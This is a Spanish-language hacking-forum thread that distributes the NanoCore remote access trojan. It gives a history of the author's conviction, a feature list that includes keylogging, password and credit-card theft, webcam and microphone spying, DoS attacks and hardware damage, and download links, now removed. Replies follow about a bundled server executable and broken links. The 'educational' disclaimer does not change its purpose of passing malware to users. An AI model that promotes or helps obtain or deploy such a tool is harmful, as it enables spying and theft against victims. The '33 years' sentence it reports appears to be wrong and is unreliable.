[NanoCore v1.2.2.0]
Edición final y completa


[Descargo de responsabilidad]
No me hago responsable del mal uso
que se pueda dar a lo aquí expuesto.
Este material es tan solo informativo
y con carácter didáctico.
"Use la información bajo
su propia responsabilidad".

[Antecedente]

El desarrollador de NanoCore fue arrestado por el FBI y se declaró culpable en 2017 por desarrollar una amenaza a la privacidad tan maliciosa, y fue sentenciado a 33 años de prisión.

Taylor Huddleston, de 27 años, quien el mes de julio de 2017 se declaró culpable de cometer y ayudar a cometer delitos informáticos a través de la venta de software malicioso a hackers que posteriormente utilizaron estos recursos para robar datos y espiar a los usuarios, entre otras cosas. Ahora, Huddleston ha sido condenado a 33 años de prisión por estas acciones llevadas a cabo entre 2012 y 2016. Bajo el alias Aeonhack, el hombre desarrollo y luego vendió el malware NanoCore a través de la Dark Web por un precio de US$ 25, en una cruzada que logró afectar cerca de 100.000 ordenadores.

Fuentes:
https://www.tekcrispy.com/2018/02/27/condenan-carcel-malware-nanocore/#:~:text=Condenan%20a%2033%20a%C3%B1os%20de%20c%C3%A1rcel%20al%20creador%20del%20malware%20NanoCore,-By&text=Bajo%20el%20alias%20Aeonhack%2C%20el,afectar%20cerca%20de%20100.000%20ordenadores.
http://www.usuariosdigitales.org/2018/02/27/condenan-33-anos-carcel-al-creador-del-malware-nanocore/


[Principales Características]


  • Bloquear ratones y teclados
  • Cambiar los fondos de escritorio
  • Descarga, carga, elimina y cambia el nombre de archivos
  • Destruye el hardware mediante el overclocking
  • Elimina malware
  • Editar registro
  • Utiliza tu conexión a Internet para realizar ataques de denegación de servicio (DoS)
  • Formatear unidades
  • Robar contraseñas, números de tarjetas de crédito
  • Modifica la página de inicio de su navegador web
  • Oculta iconos de escritorio, barra de tareas y archivos
  • Instala aplicaciones silenciosamente
  • Registra de pulsaciones de teclas, software de captura de pulsaciones de teclas
  • Abre bandeja de CD-ROM
  • Sobrecargar la unidad RAM / ROM
  • Envía buzones de mensajes
  • Reproducir sonidos
  • Controlar el mouse o el teclado
  • Grabar sonido con un micrófono conectado
  • Grabar video con una cámara web conectada
  • Mostrar errores falsos
  • Apagar, reiniciar, cerrar sesión, apagar el monitor
  • Grabe y controle la pantalla de la víctima de forma remota
  • Ver, matar e iniciar tareas en el administrador de tareas
Deja que el RAT navegue por la web con la dirección IP de la computadora infectada.

Entre otras funciones.



[SO SOPORTADOS]
  • WIN  7
  • WIN  8
  • WIN 10
[CAPTURA]

Imagen





[Escaneos de TV]



Rat:

[Enlace externo eliminado para invitados]



Server:

[Enlace externo eliminado para invitados]


*Por favor, no ocupen este sitio para escanear crypters o similares a menos que deseen que "detectable su método"







[Descarga]

[Enlace externo eliminado para invitados]


IMPORTANTE ESTE RAT FUE ADQUIRIDO DE FUENTES EXTERNAS, SE RECOMIENDA AUDITAR Y USAR EN ENTORNOS VIRTUALES SIEMPRE SERA UNA BUENA IDEA
Personalmente espero sea de interés y no haber violado alguna norma del foro.
Me despido atento a sus comentarios. 

Saludos cordiales.
Revisa la carpeta que subiste tiene un archivo 1.exe. por lo que veo es un servidor que apuntaría solo a 127.0.0.1 se copia en el registro con el nombre wanss.exe 
Hola TITAN en efecto es el server para proporcionar el análisis en VT

Mi intención era proporcionar todo lo que detalle en la descripción. Disculpa el mal entendido, no me supe explicar bien.

Puedo decir que no hay dobles intenciones.

[Enlace externo eliminado para invitados]
quesillo
13truco12: escribió: Hola TITAN en efecto es el server para proporcionar el análisis en VT

Mi intención era proporcionar todo lo que detalle en la descripción. Disculpa el mal entendido, no me supe explicar bien. 

Puedo decir que no hay dobles intenciones. 


[Enlace externo eliminado para invitados]
Ok no hay problema.
Hola, al momento de usarlo tuve varios inconvenientes. 
Al abrirlo pasado dos minutos aproximadamente la conexión a internet se desactiva (en el pc).
A veces no abre.
01010101 01101110 01101001 01100011 01101111 01100100 01100101 00100000 01100101 01110011 01110100 01110101 01110110 01101111 00100000 01100001 01101011 01101001 00101110 :)
Alpiskris2 escribió: 03 May 2022, 13:28 enlace roto no se puede descargar
El enlace esta perfecto. Lo acabo de bajar y descomprimir sin problemas.

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
DSR! escribió: 04 May 2022, 00:54
Alpiskris2 escribió: 03 May 2022, 13:28 enlace roto no se puede descargar
El enlace esta perfecto. Lo acabo de bajar y descomprimir sin problemas.
Tampoco me descarga ese enlace
¡SOLO MERECE VIVIR QUIEN POR UN NOBLE IDEAL ESTÁ DISPUESTO A MORIR!
Imagen
Si estaria roto no cargaria nada de eso. De todas formas lo resubo al mismo server ya que si no dieron el link de baja en 3 años es buena señal
[Enlace externo eliminado para invitados]

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
DSR! escribió: 05 May 2022, 16:06
Imagen
Si estaria roto no cargaria nada de eso. De todas formas lo resubo al mismo server ya que si no dieron el link de baja en 3 años es buena señal
[Enlace externo eliminado para invitados]
403 forbidden 🤔
¡SOLO MERECE VIVIR QUIEN POR UN NOBLE IDEAL ESTÁ DISPUESTO A MORIR!
Responder

Volver a “Troyanos y Herramientas”